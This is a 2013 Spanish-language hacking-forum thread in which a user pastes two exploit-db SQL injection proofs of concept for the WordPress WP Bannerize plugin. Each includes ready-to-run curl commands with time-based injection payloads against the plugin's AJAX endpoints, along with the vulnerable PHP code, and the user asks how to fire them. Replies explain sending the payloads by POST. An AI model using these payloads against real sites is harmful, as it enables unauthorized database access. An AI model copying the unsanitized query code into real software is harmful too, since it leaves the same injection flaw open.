elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  Nivel Web (Moderadores: sirdarckcat, WHK)
| | | | |-+  Dos exploits para WordPress Bannerize Plugin
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Dos exploits para WordPress Bannerize Plugin  (Leído 1,943 veces)
TapIt

Desconectado Desconectado

Mensajes: 57



Ver Perfil
Dos exploits para WordPress Bannerize Plugin
« en: 23 Enero 2013, 20:11 pm »

Hola a todos,

Tengo un par de exploits a nivel web que no se como se tiran. Son de tipo SQL injection pero creo que no se pueden utilizar en la URL, ¿donde debería utilizarlos?. Os dejo los links de exploit-db y el fuente. Gracias por la ayuda ;)

http://www.exploit-db.com/exploits/17906/

Código:

# Exploit Title: WordPress WP Bannerize plugin <= 2.8.7 SQL Injection Vulnerability
# Date: 2011-09-22
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.7 (tested)
 
---------------
PoC (POST data)
---------------
http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)
 
e.g.
curl --data "limit=1&offset=1&item[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)" -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_sorter.php
 
---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $limit = intval($_POST['limit']);
    $page_offset = (intval($_POST['offset']) - 1) * $limit;
 
    foreach($_POST["item"] as $key => $value){
        $sql = sprintf("UPDATE `%s` SET `sorter` = %s WHERE id = %s", $wpdb->prefix ."bannerize_b", (intval($key)+$page_offset ), $value );
        $result = mysql_query($sql);
    }
}


http://www.exploit-db.com/exploits/17764/

Código:
# Exploit Title: WordPress WP Bannerize plugin <= 2.8.6 SQL Injection Vulnerability
# Date: 2011-08-31
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/wp-bannerize.zip
# Version: 2.8.6 (tested)
 
---
PoC
---
curl --data "id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)-- " -H "X-Requested-With:XMLHttpRequest" http://www.site.com/wp-content/plugins/wp-bannerize/ajax_clickcounter.php
 
---------------
Vulnerable code
---------------
if ( @isset($_SERVER['HTTP_X_REQUESTED_WITH']) ) {
    ...
    $sql = "UPDATE `" . $wpdb->prefix ."bannerize_b` SET `clickcount` = `clickcount`+1 WHERE id = " . $_POST['id'];
    $result = mysql_query($sql);


En línea

Busca y encontrarás...
TapIt

Desconectado Desconectado

Mensajes: 57



Ver Perfil
Re: Dos exploits para WordPress Bannerize Plugin
« Respuesta #1 en: 23 Enero 2013, 20:15 pm »

Solucionado. Dejo el Post por si acaso a alguien le viene bien!

http://www.linuxhispano.net/2009/11/26/navega-por-internet-conquista-la-web-con-curl-parte-1/
En línea

Busca y encontrarás...
it3r

Desconectado Desconectado

Mensajes: 101



Ver Perfil
Re: Dos exploits para WordPress Bannerize Plugin
« Respuesta #2 en: 23 Enero 2013, 21:15 pm »

solo para aclarar un poco mas, cuando inyectas por url estas ocupando el metodo http GET y cuando los datos no viajan por la url, se ocupa el método POST.

Saludos.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Plugin Para MSN con VB?
Programación Visual Basic
Xephiro 4 1,722 Último mensaje 25 Diciembre 2008, 19:51 pm
por Xephiro
Problema con plugin Comments de Facebook + Wordpress
Desarrollo Web
KateLibby 2 1,824 Último mensaje 24 Agosto 2012, 16:03 pm
por KateLibby
Vulnerabilidad Crítica en WordPress en popular plugin "W3 Total Cache"
Noticias
HdM 5 2,592 Último mensaje 29 Diciembre 2012, 07:35 am
por jdc
Click 'N' Load 2 bbcode para Wordpress - Plugin v1.0
Desarrollo Web
bacanzito 1 2,100 Último mensaje 23 Julio 2013, 12:53 pm
por z3nth10n
¿Cómo de peligroso es usar un plugin pirata (nulled) para Wordpress?
Dudas Generales
Eleкtro 2 2,572 Último mensaje 3 Diciembre 2017, 20:38 pm
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines